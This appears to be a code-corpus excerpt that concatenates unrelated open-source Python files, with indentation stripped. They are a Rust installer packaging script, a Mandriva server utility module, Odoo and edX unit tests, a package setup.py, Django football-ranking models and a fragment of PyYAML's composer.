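#   python2.7 package-rust.py --target=x86_64-pc-windows-gnu --exe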
def run(args):
print ' '.join(args)
retval = subprocess.call(args)
if retval != 0:
print "call failed: " + str(args)
sys.exit(1)
# Move file with target overwrite
def move_file(source, target):
try: os.remove(target)
except OSError: pass
shutil.move(source, target)
INPUT_DIR = "./in"
OUTPUT_DIR = "./out"
TEMP_DIR = "./tmp"
RUSTC_PACKAGE_NAME = "rustc"
COMBINED_PACKAGE_NAME = "rust"
# Create the temp directory
if os.path.isdir(TEMP_DIR):
print "Removing old temp..."
shutil.rmtree(TEMP_DIR)
os.mkdir(TEMP_DIR)
if not os.path.isdir(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
# The names of the packages that need to be combined via rust-installer
components = [RUSTC_PACKAGE_NAME, "cargo", "rust-docs"]
if "pc-windows-gnu" in target:
components.append("rust-mingw")
# Now find the names of the tarballs that belong to those components
inputs = []
package_version = None
rustc_installer = None
cargo_installer = None
docs_installer = None
mingw_installer = None
for component in components:
component_installer = None
for filename in os.listdir(INPUT_DIR):
if target in filename and component in filename:
# Hack: several components contain 'rust' in the name
if not (component == "rust" and ("rust-docs" in filename or "rust-mingw" in filename)):
component_installer = filename
if not component_installer:
print "unable to find installer for component " + component + ", target " + target
sys.exit(1)
inputs.append(INPUT_DIR + "/" + component_installer)
# Extract the version from the filename
if component == RUSTC_PACKAGE_NAME:
s = component_installer[len(RUSTC_PACKAGE_NAME) + 1:]
p = s.find(target)
package_version = s[:p - 1]
rustc_installer = component_installer
if component == "cargo":
cargo_installer = component_installer
if component == "rust-docs":
docs_installer = component_installer
if component == "rust-mingw":
mingw_installer = component_installer
assert package_version is not None
assert rustc_installer is not None
# Set up the overlay of license info
run(["tar", "xzf", INPUT_DIR + "/" + rustc_installer, "-C", TEMP_DIR, ])
rustc_dir = TEMP_DIR + "/" + rustc_installer[:len(rustc_installer) - len(".tar.gz")]
overlay_dir = TEMP_DIR + "/overlay"
os.mkdir(overlay_dir)
shutil.copyfile(rustc_dir + "/COPYRIGHT", overlay_dir + "/COPYRIGHT")
shutil.copyfile(rustc_dir + "/LICENSE-APACHE", overlay_dir + "/LICENSE-APACHE")
shutil.copyfile(rustc_dir + "/LICENSE-MIT", overlay_dir + "/LICENSE-MIT")
shutil.copyfile(rustc_dir + "/version", overlay_dir + "/version")
# Use a custom README that explains how to install
shutil.copyfile("./etc/README.md", overlay_dir + "/README.md")
if make_comb:
# Combine the installers
tarball_list=",".join(inputs)
package_name=COMBINED_PACKAGE_NAME + "-" + package_version + "-" + target
run(["sh", "./rust-installer/combine-installers.sh",
"--product-name=Rust",
"--rel-manifest-dir=rustlib",
"--success-message=Rust-is-ready-to-roll.",
"--work-dir=" + TEMP_DIR + "/work",
"--output-dir=" + OUTPUT_DIR,
"--package-name=" + package_name,
"--legacy-manifest-dirs=rustlib,cargo",
"--input-tarballs=" + tarball_list,
"--non-installed-overlay=" + overlay_dir
])
# Everything below here is used for producing non-rust-installer packaging
# Create the LICENSE.txt file used in some GUI installers
license_file = TEMP_DIR + "/LICENSE.txt"
cmd = "cat {0}/COPYRIGHT {0}/LICENSE-APACHE {0}/LICENSE-MIT > {1}".format(rustc_dir, license_file)
run(["sh", "-c", cmd])
if make_msi:
license_rtf = TEMP_DIR + "/LICENSE.rtf"
# Convert plain text to RTF
with open(license_file, "rt") as input:
with open(license_rtf, "wt") as output:
output.write(r"{\rtf1\ansi\deff0{\fonttbl{\f0\fnil\fcharset0 Arial;}}\nowwrap\fs18"+"\n")
for line in input.readlines():
output.write(line)
output.write(r"\line ")
output.write("}")
# Reconstruct the following variables from the Rust makefile from the version number.
# Currently these are needed by the Windows installer.
CFG_RELEASE_NUM = None
CFG_PRERELEASE_VERSION = None
CFG_RELEASE = None
CFG_PACKAGE_NAME = None
CFG_BUILD = None
CFG_PACKAGE_VERS = None
# Pull the version number out of the version file
# Examples:
# 1.0.0-alpha.2 (522d09dfe 2015-02-19) (built 2015-02-19)
# 1.0.0-nightly (b0746ff19 2015-03-05) (built 2015-03-06)
CFG_RELEASE_INFO = None
full_version = None
for line in open(os.path.join(rustc_dir, "version")):
print "reported version: " + line
full_version = line.split(" ")[0]
CFG_RELEASE_INFO = line.strip()
assert full_version is not None
version_number = full_version.split("-")[0]
prerelease_version = ""
if "beta." in full_version or "alpha." in full_version:
prerelease_version = "." + full_version.split(".")[-1]
# Guess the channel from the version
channel = None
if "nightly" in full_version:
channel = "nightly"
elif "beta" in full_version or "alpha" in full_version:
channel = "beta"
elif "dev" in full_version:
channel = "dev"
else:
channel = "stable"
CFG_RELEASE_NUM=version_number
CFG_RELEASE=full_version
CFG_PRERELEASE_VERSION=prerelease_version
CFG_VER_MAJOR, CFG_VER_MINOR, CFG_VER_PATCH = version_number.split('.')
CFG_VER_BUILD = str((datetime.date.today() - datetime.date(2000,1,1)).days) # days since Y2K
# Logic reproduced from main.mk
if channel == "stable":
CFG_PACKAGE_VERS=CFG_RELEASE_NUM
elif channel == "beta":
CFG_PACKAGE_VERS="beta"
elif channel == "nightly":
CFG_PACKAGE_VERS="nightly"
elif channel == "dev":
CFG_PACKAGE_VERS=CFG_RELEASE_NUM + "-dev"
else:
print "unknown release channel"
sys.exit(1)
# This should be the same as the name on the tarballs
CFG_PACKAGE_NAME=COMBINED_PACKAGE_NAME + "-" + CFG_PACKAGE_VERS
CFG_BUILD=target
CFG_CHANNEL=channel
if "pc-windows-gnu" in target:
CFG_MINGW="1"
else:
CFG_MINGW="0"
if "x86_64" in target:
CFG_PLATFORM = "x64"
elif "i686":
CFG_PLATFORM = "x86"
# Export all vars starting with CFG_
cfgs = [pair for pair in locals().items() if pair[0].startswith("CFG_")]
cfgs.sort()
for k,v in cfgs:
print k,"=",v
os.environ[k] = v
if make_pkg:
print "creating .pkg"
assert docs_installer is not None
assert cargo_installer is not None
rustc_package_name = rustc_installer.replace(".tar.gz", "")
docs_package_name = docs_installer.replace(".tar.gz", "")
cargo_package_name = cargo_installer.replace(".tar.gz", "")
os.mkdir(TEMP_DIR + "/pkg")
shutil.copytree(TEMP_DIR + "/work/" + rustc_package_name, TEMP_DIR + "/pkg/rustc")
shutil.copytree(TEMP_DIR + "/work/" + cargo_package_name, TEMP_DIR + "/pkg/cargo")
shutil.copytree(TEMP_DIR + "/work/" + docs_package_name, TEMP_DIR + "/pkg/rust-docs")
# The package root, extracted from a tarball, has entirely wrong permissions.
# This goes over everything and fixes them.
run(["chmod", "-R", "u+rwX,go+rX,go-w", TEMP_DIR + "/pkg"])
for filename in os.listdir(TEMP_DIR + "/pkg/rustc/rustc/bin"):
run(["chmod", "0755", TEMP_DIR + "/pkg/rustc/rustc/bin/" + filename])
for filename in os.listdir(TEMP_DIR + "/pkg/cargo/cargo/bin"):
run(["chmod", "0755", TEMP_DIR + "/pkg/cargo/cargo/bin/" + filename])
# Copy the postinstall script that will execute install.sh
shutil.copyfile("./pkg/postinstall", TEMP_DIR + "/pkg/rustc/postinstall")
run(["chmod", "a+x", TEMP_DIR + "/pkg/rustc/postinstall"])
shutil.copyfile("./pkg/postinstall", TEMP_DIR + "/pkg/cargo/postinstall")
run(["chmod", "a+x", TEMP_DIR + "/pkg/cargo/postinstall"])
shutil.copyfile("./pkg/postinstall", TEMP_DIR + "/pkg/rust-docs/postinstall")
run(["chmod", "a+x", TEMP_DIR + "/pkg/rust-docs/postinstall"])
pkgbuild_cmd = "pkgbuild --identifier org.rust-lang.rustc " + \
"--scripts " + TEMP_DIR + "/pkg/rustc --nopayload " + TEMP_DIR + "/pkg/rustc.pkg"
run(["sh", "-c", pkgbuild_cmd])
pkgbuild_cmd = "pkgbuild --identifier org.rust-lang.cargo " + \
"--scripts " + TEMP_DIR + "/pkg/cargo --nopayload " + TEMP_DIR + "/pkg/cargo.pkg"
run(["sh", "-c", pkgbuild_cmd])
pkgbuild_cmd = "pkgbuild --identifier org.rust-lang.rust-docs " + \
"--scripts " + TEMP_DIR + "/pkg/rust-docs --nopayload " + TEMP_DIR + "/pkg/rust-docs.pkg"
run(["sh", "-c", pkgbuild_cmd])
# Also create an 'uninstall' package
os.mkdir(TEMP_DIR + "/pkg/uninstall")
shutil.copyfile("./pkg/postinstall", TEMP_DIR + "/pkg/uninstall/postinstall")
run(["chmod", "a+x", TEMP_DIR + "/pkg/uninstall/postinstall"])
pkgbuild_cmd = "pkgbuild --identifier org.rust-lang.uninstall " + \
"--scripts " + TEMP_DIR + "/pkg/uninstall --nopayload " + TEMP_DIR + "/pkg/uninstall.pkg"
run(["sh", "-c", pkgbuild_cmd])
os.mkdir(TEMP_DIR + "/pkg/res")
shutil.copyfile(TEMP_DIR + "/LICENSE.txt", TEMP_DIR + "/pkg/res/LICENSE.txt")
shutil.copyfile("./gfx/rust-logo.png", TEMP_DIR + "/pkg/res/rust-logo.png")
productbuild_cmd = "productbuild --distribution ./pkg/Distribution.xml " + \
"--resources " + TEMP_DIR + "/pkg/res " + OUTPUT_DIR + "/" + package_name + ".pkg " + \
"--package-path " + TEMP_DIR + "/pkg"
run(["sh", "-c", productbuild_cmd])
if make_exe or make_msi:
if make_exe:
print "creating .exe"
if make_msi:
print "creating .msi"
assert docs_installer is not None
assert cargo_installer is not None
exe_temp_dir = TEMP_DIR + "/exe"
os.mkdir(exe_temp_dir)
run(["tar", "xzf", INPUT_DIR + "/" + rustc_installer, "-C", exe_temp_dir])
run(["tar", "xzf", INPUT_DIR + "/" + docs_installer, "-C", exe_temp_dir])
run(["tar", "xzf", INPUT_DIR + "/" + cargo_installer, "-C", exe_temp_dir])
orig_rustc_dir = exe_temp_dir + "/" + rustc_installer.replace(".tar.gz", "") + "/rustc"
orig_docs_dir = exe_temp_dir + "/" + docs_installer.replace(".tar.gz", "") + "/rust-docs"
orig_cargo_dir = exe_temp_dir + "/" + cargo_installer.replace(".tar.gz", "") + "/cargo"
# Move these to locations needed by the iscc script and wix sources
rustc_dir = exe_temp_dir + "/rustc"
docs_dir = exe_temp_dir + "/rust-docs"
cargo_dir = exe_temp_dir + "/cargo"
os.rename(orig_rustc_dir, rustc_dir)
os.rename(orig_docs_dir, docs_dir)
os.rename(orig_cargo_dir, cargo_dir)
if mingw_installer is not None:
run(["tar", "xzf", INPUT_DIR + "/" + mingw_installer, "-C", exe_temp_dir])
orig_mingw_dir = exe_temp_dir + "/" + mingw_installer.replace(".tar.gz", "") + "/rust-mingw"
mingw_dir = exe_temp_dir + "/rust-mingw"
os.rename(orig_mingw_dir, mingw_dir)
else:
assert "pc-windows-gnu" not in target
# Remove the installer files we don't need
dir_comp_pairs = [(rustc_dir, "rustc"), (docs_dir, "rust-docs"),
(cargo_dir, "cargo")]
if mingw_installer is not None:
dir_comp_pairs += [(mingw_dir, "rust-mingw")]
for dir_and_component in dir_comp_pairs:
dir_ = dir_and_component[0]
component = dir_and_component[1]
os.remove(dir_ + "/manifest.in")
if make_exe:
# Copy installer files, etc.
shutil.copyfile("./exe/rust.iss", exe_temp_dir + "/rust.iss")
shutil.copyfile("./exe/modpath.iss", exe_temp_dir + "/modpath.iss")
shutil.copyfile("./exe/upgrade.iss", exe_temp_dir + "/upgrade.iss")
shutil.copyfile("./gfx/rust-logo.ico", exe_temp_dir + "/rust-logo.ico")
shutil.copyfile(TEMP_DIR + "/LICENSE.txt", exe_temp_dir + "/LICENSE.txt")
cwd=os.getcwd()
os.chdir(exe_temp_dir)
args = ["iscc", "rust.iss"]
if "windows-gnu" in target:
args += ["/dMINGW"]
run(args)
os.chdir(cwd)
exefile = CFG_PACKAGE_NAME + "-" + CFG_BUILD + ".exe"
move_file(exe_temp_dir + "/" + exefile, OUTPUT_DIR + "/" + exefile)
if make_msi:
# Copy installer files, etc.
for f in glob.glob("./msi/*"):
shutil.copy(f, exe_temp_dir)
for f in glob.glob("./gfx/*"):
shutil.copy(f, exe_temp_dir)
shutil.copy(TEMP_DIR + "/LICENSE.rtf", exe_temp_dir)
cwd=os.getcwd()
os.chdir(exe_temp_dir)
run(["make", "SVAL=%i" % msi_sval])
os.chdir(cwd)
msifile = CFG_PACKAGE_NAME + "-" + CFG_BUILD + ".msi"
move_file(exe_temp_dir + "/" + msifile, OUTPUT_DIR + "/" + msifile)
| apache-2.0 |
jfmorcillo/mss | mss/agent/lib/utils.py | 3 | 2996 | # -*- coding: UTF-8 -*-
#
# (c) 2010-2012 Mandriva, http://www.mandriva.com/
#
# This file is part of Mandriva Server Setup
#
# MSS is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MSS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with MSS; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
import traceback
import sys
import ConfigParser
import re
import os
import netifaces
from IPy import IP
def formatExceptionInfo(maxTBlevel=5):
cla, exc, trbk = sys.exc_info()
excName = cla.__name__
try:
excArgs = exc.__dict__["args"]
except KeyError:
excArgs = "<no args>"
excTb = traceback.format_tb(trbk, maxTBlevel)
return "%s %s : \n%s" % (excName, excArgs, excTb[0])
def getINIoption(section, option, ini):
config = ConfigParser.SafeConfigParser()
config.read(ini)
return config.get(section, option)
def get_config_option(file, option):
"""
Returns the option value of a config file formatted like:
OPTION=value
"""
if os.path.exists(file):
with open(file) as f:
string = f.read()
expr = re.compile("\s*%s\s*=\s*(.*)" % option, re.M)
match = expr.search(string)
if match and match.group(1):
return match.group(1).strip()
else:
return ""
else:
raise OSError("File not found")
def grep(search, file):
if os.path.exists(file):
with open(file) as f:
string = f.read()
expr = re.compile(search, re.M)
if expr.search(string):
return True
else:
return False
else:
return False
def ethernet_ifs():
ifs = []
for interface in netifaces.interfaces():
if interface.startswith("eth"):
if_detail = netifaces.ifaddresses(interface)
# check if interface is configured
if netifaces.AF_INET in if_detail:
addr = if_detail[netifaces.AF_INET][0]['addr']
netmask = if_detail[netifaces.AF_INET][0]['netmask']
network = IP(addr).make_net(netmask).strNormal(0)
ifs.append([interface, addr, network, netmask])
return ifs
class Singleton(type):
def __init__(cls, name, bases, dict):
super(Singleton, cls).__init__(name, bases, dict)
cls.instance = None
def __call__(cls, *args, **kw):
if cls.instance is None:
cls.instance = super(Singleton, cls).__call__(*args, **kw)
return cls.instance
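# Usage sketch (illustrative, not part of the original module): with the
# Python 2 metaclass syntax, every instantiation returns the same object.
#
#     class Registry(object):
#         __metaclass__ = Singleton
#
#     assert Registry() is Registry()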
| gpl-3.0 |
dkodnik/arp | addons/web/tests/test_menu.py | 34 | 5729 | # -*- coding: utf-8 -*-
import collections
import mock
import unittest2
from openerp.http import request as req
from . import common
from ..controllers import main
class Placeholder(object):
def __init__(self, **kwargs):
for k, v in kwargs.iteritems():
setattr(self, k, v)
class LoadTest(common.MockRequestCase):
def setUp(self):
super(LoadTest, self).setUp()
self.menu = main.Menu()
# Have self.request.session.model() return a different mock object for
# each model (but always the same mock for a given model name)
models = collections.defaultdict(mock.Mock)
model = req.session.model.side_effect = \
lambda model_name: models[model_name]
self.MockMenus = model('ir.ui.menu')
# Mock the absence of custom menu
model('res.users').read.return_value = []
def tearDown(self):
del self.MockMenus
del self.menu
super(LoadTest, self).tearDown()
def test_empty(self):
self.MockMenus.search.return_value = []
self.MockMenus.read.return_value = []
root = self.menu.load()
self.MockMenus.search.assert_called_with(
[('parent_id','=', False)], 0, False, False,
req.context)
self.assertEqual(root['all_menu_ids'], [])
self.assertListEqual(
root['children'],
[])
def test_applications_sort(self):
self.MockMenus.search.return_value = [1, 2, 3]
self.MockMenus.read.side_effect = lambda *args: [
{'id': 1, 'sequence': 1, 'parent_id': False},
{'id': 3, 'sequence': 2, 'parent_id': False},
{'id': 2, 'sequence': 3, 'parent_id': False},
]
root = self.menu.load()
self.MockMenus.search.assert_called_with(
[('id','child_of', [1, 2, 3])], 0, False, False,
req.context)
self.MockMenus.read.assert_called_with(
[1, 2, 3], ['name', 'sequence', 'parent_id',
'action'],
req.context)
self.assertEqual(root['all_menu_ids'], [1, 2, 3])
self.assertEqual(
root['children'],
[{
'id': 1, 'sequence': 1,
'parent_id': False, 'children': []
}, {
'id': 3, 'sequence': 2,
'parent_id': False, 'children': []
}, {
'id': 2, 'sequence': 3,
'parent_id': False, 'children': []
}])
def test_deep(self):
self.MockMenus.search.side_effect = lambda domain, *args: (
[1] if domain == [('parent_id', '=', False)] else [1, 2, 3, 4])
root = {'id': 1, 'sequence': 1, 'parent_id': False}
self.MockMenus.read.side_effect = lambda ids, *args: (
[root] if ids == [1] else [
{'id': 1, 'sequence': 1, 'parent_id': False},
{'id': 2, 'sequence': 2, 'parent_id': [1, '']},
{'id': 3, 'sequence': 1, 'parent_id': [2, '']},
{'id': 4, 'sequence': 2, 'parent_id': [2, '']},
])
root = self.menu.load()
self.MockMenus.search.assert_called_with(
[('id','child_of', [1])], 0, False, False,
req.context)
self.assertEqual(root['all_menu_ids'], [1, 2, 3, 4])
self.assertEqual(
root['children'],
[{
'id': 1,
'sequence': 1,
'parent_id': False,
'children': [{
'id': 2,
'sequence': 2,
'parent_id': [1, ''],
'children': [{
'id': 3,
'sequence': 1,
'parent_id': [2, ''],
'children': []
}, {
'id': 4,
'sequence': 2,
'parent_id': [2, ''],
'children': []
}]
}]
}]
)
class ActionMungerTest(unittest2.TestCase):
def setUp(self):
self.menu = main.Menu()
def test_actual_treeview(self):
action = {
"views": [[False, "tree"], [False, "form"],
[False, "calendar"]],
"view_type": "tree",
"view_id": False,
"view_mode": "tree,form,calendar"
}
changed = action.copy()
del action['view_type']
main.fix_view_modes(changed)
self.assertEqual(changed, action)
def test_list_view(self):
action = {
"views": [[False, "tree"], [False, "form"],
[False, "calendar"]],
"view_type": "form",
"view_id": False,
"view_mode": "tree,form,calendar"
}
main.fix_view_modes(action)
self.assertEqual(action, {
"views": [[False, "list"], [False, "form"],
[False, "calendar"]],
"view_id": False,
"view_mode": "list,form,calendar"
})
def test_redundant_views(self):
action = {
"views": [[False, "tree"], [False, "form"],
[False, "calendar"], [42, "tree"]],
"view_type": "form",
"view_id": False,
"view_mode": "tree,form,calendar"
}
main.fix_view_modes(action)
self.assertEqual(action, {
"views": [[False, "list"], [False, "form"],
[False, "calendar"], [42, "list"]],
"view_id": False,
"view_mode": "list,form,calendar"
})
| agpl-3.0 |
edxnercel/edx-platform | cms/djangoapps/contentstore/views/tests/test_library.py | 114 | 9392 | """
Unit tests for contentstore.views.library
More important high-level tests are in contentstore/tests/test_libraries.py
"""
from contentstore.tests.utils import AjaxEnabledTestClient, parse_json
from contentstore.utils import reverse_course_url, reverse_library_url
from contentstore.views.component import get_component_templates
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import LibraryFactory
from mock import patch
from opaque_keys.edx.locator import CourseKey, LibraryLocator
import ddt
from student.roles import LibraryUserRole
LIBRARY_REST_URL = '/library/' # URL for GET/POST requests involving libraries
def make_url_for_lib(key):
""" Get the RESTful/studio URL for testing the given library """
if isinstance(key, LibraryLocator):
key = unicode(key)
return LIBRARY_REST_URL + key
@ddt.ddt
class UnitTestLibraries(ModuleStoreTestCase):
"""
Unit tests for library views
"""
def setUp(self):
user_password = super(UnitTestLibraries, self).setUp()
self.client = AjaxEnabledTestClient()
self.client.login(username=self.user.username, password=user_password)
######################################################
# Tests for /library/ - list and create libraries:
@patch("contentstore.views.library.LIBRARIES_ENABLED", False)
def test_with_libraries_disabled(self):
"""
The library URLs should return 404 if libraries are disabled.
"""
response = self.client.get_json(LIBRARY_REST_URL)
self.assertEqual(response.status_code, 404)
def test_list_libraries(self):
"""
Test that we can GET /library/ to list all libraries visible to the current user.
"""
# Create some more libraries
libraries = [LibraryFactory.create() for _ in range(3)]
lib_dict = dict([(lib.location.library_key, lib) for lib in libraries])
response = self.client.get_json(LIBRARY_REST_URL)
self.assertEqual(response.status_code, 200)
lib_list = parse_json(response)
self.assertEqual(len(lib_list), len(libraries))
for entry in lib_list:
self.assertIn("library_key", entry)
self.assertIn("display_name", entry)
key = CourseKey.from_string(entry["library_key"])
self.assertIn(key, lib_dict)
self.assertEqual(entry["display_name"], lib_dict[key].display_name)
del lib_dict[key] # To ensure no duplicates are matched
@ddt.data("delete", "put")
def test_bad_http_verb(self, verb):
"""
We should get an error if we do weird requests to /library/
"""
response = getattr(self.client, verb)(LIBRARY_REST_URL)
self.assertEqual(response.status_code, 405)
def test_create_library(self):
""" Create a library. """
response = self.client.ajax_post(LIBRARY_REST_URL, {
'org': 'org',
'library': 'lib',
'display_name': "New Library",
})
self.assertEqual(response.status_code, 200)
# That's all we check. More detailed tests are in contentstore.tests.test_libraries...
@patch.dict('django.conf.settings.FEATURES', {'ENABLE_CREATOR_GROUP': True})
def test_lib_create_permission(self):
"""
Users who are not given course creator roles should still be able to
create libraries.
"""
self.client.logout()
ns_user, password = self.create_non_staff_user()
self.client.login(username=ns_user.username, password=password)
response = self.client.ajax_post(LIBRARY_REST_URL, {
'org': 'org', 'library': 'lib', 'display_name': "New Library",
})
self.assertEqual(response.status_code, 200)
@ddt.data(
{},
{'org': 'org'},
{'library': 'lib'},
{'org': 'C++', 'library': 'lib', 'display_name': 'Lib with invalid characters in key'},
{'org': 'Org', 'library': 'Wh@t?', 'display_name': 'Lib with invalid characters in key'},
)
def test_create_library_invalid(self, data):
"""
Make sure we are prevented from creating libraries with invalid keys/data
"""
response = self.client.ajax_post(LIBRARY_REST_URL, data)
self.assertEqual(response.status_code, 400)
def test_no_duplicate_libraries(self):
"""
We should not be able to create multiple libraries with the same key
"""
lib = LibraryFactory.create()
lib_key = lib.location.library_key
response = self.client.ajax_post(LIBRARY_REST_URL, {
'org': lib_key.org,
'library': lib_key.library,
'display_name': "A Duplicate key, same as 'lib'",
})
self.assertIn('already a library defined', parse_json(response)['ErrMsg'])
self.assertEqual(response.status_code, 400)
######################################################
# Tests for /library/:lib_key/ - get a specific library as JSON or HTML editing view
def test_get_lib_info(self):
"""
Test that we can get data about a library (in JSON format) using /library/:key/
"""
# Create a library
lib_key = LibraryFactory.create().location.library_key
# Re-load the library from the modulestore, explicitly including version information:
lib = self.store.get_library(lib_key, remove_version=False, remove_branch=False)
version = lib.location.library_key.version_guid
self.assertNotEqual(version, None)
response = self.client.get_json(make_url_for_lib(lib_key))
self.assertEqual(response.status_code, 200)
info = parse_json(response)
self.assertEqual(info['display_name'], lib.display_name)
self.assertEqual(info['library_id'], unicode(lib_key))
self.assertEqual(info['previous_version'], None)
self.assertNotEqual(info['version'], None)
self.assertNotEqual(info['version'], '')
self.assertEqual(info['version'], unicode(version))
def test_get_lib_edit_html(self):
"""
Test that we can get the studio view for editing a library using /library/:key/
"""
lib = LibraryFactory.create()
response = self.client.get(make_url_for_lib(lib.location.library_key))
self.assertEqual(response.status_code, 200)
self.assertIn("<html", response.content)
self.assertIn(lib.display_name, response.content)
@ddt.data('library-v1:Nonexistent+library', 'course-v1:Org+Course', 'course-v1:Org+Course+Run', 'invalid')
def test_invalid_keys(self, key_str):
"""
Check that various Nonexistent/invalid keys give 404 errors
"""
response = self.client.get_json(make_url_for_lib(key_str))
self.assertEqual(response.status_code, 404)
def test_bad_http_verb_with_lib_key(self):
"""
We should get an error if we do weird requests to /library/
"""
lib = LibraryFactory.create()
for verb in ("post", "delete", "put"):
response = getattr(self.client, verb)(make_url_for_lib(lib.location.library_key))
self.assertEqual(response.status_code, 405)
def test_no_access(self):
user, password = self.create_non_staff_user()
self.client.login(username=user, password=password)
lib = LibraryFactory.create()
response = self.client.get(make_url_for_lib(lib.location.library_key))
self.assertEqual(response.status_code, 403)
def test_get_component_templates(self):
"""
Verify that templates for adding discussion and advanced components to
content libraries are not provided.
"""
lib = LibraryFactory.create()
lib.advanced_modules = ['lti']
lib.save()
templates = [template['type'] for template in get_component_templates(lib, library=True)]
self.assertIn('problem', templates)
self.assertNotIn('discussion', templates)
self.assertNotIn('advanced', templates)
def test_manage_library_users(self):
"""
Simple test that the Library "User Access" view works.
Also tests that we can use the REST API to assign a user to a library.
"""
library = LibraryFactory.create()
extra_user, _ = self.create_non_staff_user()
manage_users_url = reverse_library_url('manage_library_users', unicode(library.location.library_key))
response = self.client.get(manage_users_url)
self.assertEqual(response.status_code, 200)
# extra_user has not been assigned to the library so should not show up in the list:
self.assertNotIn(extra_user.username, response.content)
# Now add extra_user to the library:
user_details_url = reverse_course_url(
'course_team_handler',
library.location.library_key, kwargs={'email': extra_user.email}
)
edit_response = self.client.ajax_post(user_details_url, {"role": LibraryUserRole.ROLE})
self.assertIn(edit_response.status_code, (200, 204))
# Now extra_user should appear in the list:
response = self.client.get(manage_users_url)
self.assertEqual(response.status_code, 200)
self.assertIn(extra_user.username, response.content)
| agpl-3.0 |
Som-Energia/intercoop | python/setup.py | 1 | 1213 | #!/usr/bin/env python
from setuptools import setup, find_packages
readme = open("README.rst").read()
setup(
name = "intercoop",
version = "0.2.1",
description =
"Intercooperation library",
author = "Som Energia SCCL",
author_email = "info@somenergia.coop",
url = 'https://github.com/Som-Energia/intercoop',
long_description = readme,
license = 'GNU Affero General Public License v3 or later (AGPLv3+)',
packages=find_packages(exclude=['*[tT]est*']),
scripts=[
'api-example-somacme.py',
'portal-example-somillusio.py',
'validate-intercoop.py',
],
install_requires=[
'pycrypto',
'yamlns>=0.6',
'requests',
'requests-mock',
'flask',
'jsonschema<3',
'erppeek',
# 'qrcode',
# 'lxml',
# 'qrtools',
# 'zbar',
],
include_package_data = True,
test_suite = 'intercoop',
classifiers = [
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
'Intended Audience :: Developers',
'Development Status :: 4 - Beta',
'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',
'Operating System :: OS Independent',
],
)
| agpl-3.0 |
jeremyjbowers/cfbreference_com | rankings/models.py | 1 | 2698 | from django.db import models
from college.models import College, Player, Week, CollegeYear
RANKINGTYPE_CHOICES = (
('T', 'Team'),
('P', 'Player'),
)
CURRENT_SEASON = 2011
class RankingType(models.Model):
name = models.CharField(max_length=75)
slug = models.SlugField(max_length=75)
typename = models.CharField(max_length=1, choices=RANKINGTYPE_CHOICES)
ncaa_name = models.CharField(max_length=75)
def __unicode__(self):
return self.name
def get_current_url(self):
return "/rankings/%s/%s/" % (self.slug, CURRENT_SEASON)
def get_partial_url(self):
return "/rankings/%s/" % self.slug
def year_list(self):
return list(set([y.year for y in self.ranking_set.all()]))
class Ranking(models.Model):
ranking_type = models.ForeignKey(RankingType)
collegeyear = models.ForeignKey(CollegeYear)
season = models.IntegerField()
week = models.ForeignKey(Week)
rank = models.PositiveIntegerField()
is_tied = models.BooleanField()
actual = models.FloatField()
conference_rank = models.PositiveIntegerField(null=True)
is_conf_tied = models.BooleanField()
division = models.CharField(max_length=1)
def __unicode__(self):
return "%s - %s (%s)" % (self.ranking_type, self.collegeyear, self.week)
def get_week_url(self):
return "/rankings/%s/%s/week/%s/" % (self.ranking_type.slug, self.year, self.week.week_num)
class RushingSummary(models.Model):
player = models.ForeignKey(Player)
season = models.IntegerField()
week = models.ForeignKey(Week)
rank = models.PositiveIntegerField()
is_tied = models.BooleanField()
carries = models.PositiveIntegerField()
net = models.PositiveIntegerField()
td = models.PositiveIntegerField()
average = models.FloatField()
yards_per_game = models.FloatField()
def __unicode__(self):
return "%s - %s, %s" (self.player, self.year, self.yards_per_game)
class PassEfficiency(models.Model):
player = models.ForeignKey(Player)
season = models.IntegerField()
week = models.ForeignKey(Week)
rank = models.PositiveIntegerField()
attempts = models.PositiveIntegerField()
completions = models.PositiveIntegerField()
completion_pct = models.FloatField()
interceptions = models.PositiveIntegerField()
attempts_per_interception = models.FloatField()
yards = models.PositiveIntegerField()
yards_per_attempt = models.FloatField()
touchdowns = models.PositiveIntegerField()
attempts_per_touchdown = models.FloatField()
rating = models.FloatField()
def __unicode__(self):
return self.player.name
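# Query sketch (illustrative, not part of the original module); the slug
# 'ap' is a hypothetical RankingType, while season, week__week_num and
# rank correspond to fields defined above.
#
#     top_ten = Ranking.objects.filter(
#         ranking_type__slug='ap',
#         season=CURRENT_SEASON,
#         week__week_num=1,
#     ).order_by('rank')[:10]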
| apache-2.0 |
f-guichard/cf-sample-php-buildpack-custo | lib/yaml/composer.py | 534 | 4921 |
__all__ = ['Composer', 'ComposerError']
from error import MarkedYAMLError
from events import *
from nodes import *
class ComposerError(MarkedYAMLError):
pass
class Composer(object):
def __init__(self):
self.anchors = {}
def check_node(self):
# Drop the STREAM-START event.
if self.check_event(StreamStartEvent):
self.get_event()
# If there are more documents available?
return not self.check_event(StreamEndEvent)
def get_node(self):
# Get the root node of the next document.
if not self.check_event(StreamEndEvent):
return self.compose_document()
def get_single_node(self):
# Drop the STREAM-START event.
self.get_event()
# Compose a document if the stream is not empty.
document = None
if not self.check_event(StreamEndEvent):
document = self.compose_document()
# Ensure that the stream contains no more documents.
if not self.check_event(StreamEndEvent):
event = self.get_event()
raise ComposerError("expected a single document in the stream",
document.start_mark, "but found another document",
event.start_mark)
# Drop the STREAM-END event.
self.get_event()
return document
def compose_document(self):
# Drop the DOCUMENT-START event.
self.get_event()
# Compose the root node.
node = self.compose_node(None, None)
# Drop the DOCUMENT-END event.
self.get_event()
self.anchors = {}
return node
def compose_node(self, parent, index):
if self.check_event(AliasEvent):
event = self.get_event()
anchor = event.anchor
if anchor not in self.anchors:
raise ComposerError(None, None, "found undefined alias %r"
% anchor.encode('utf-8'), event.start_mark)
return self.anchors[anchor]
event = self.peek_event()
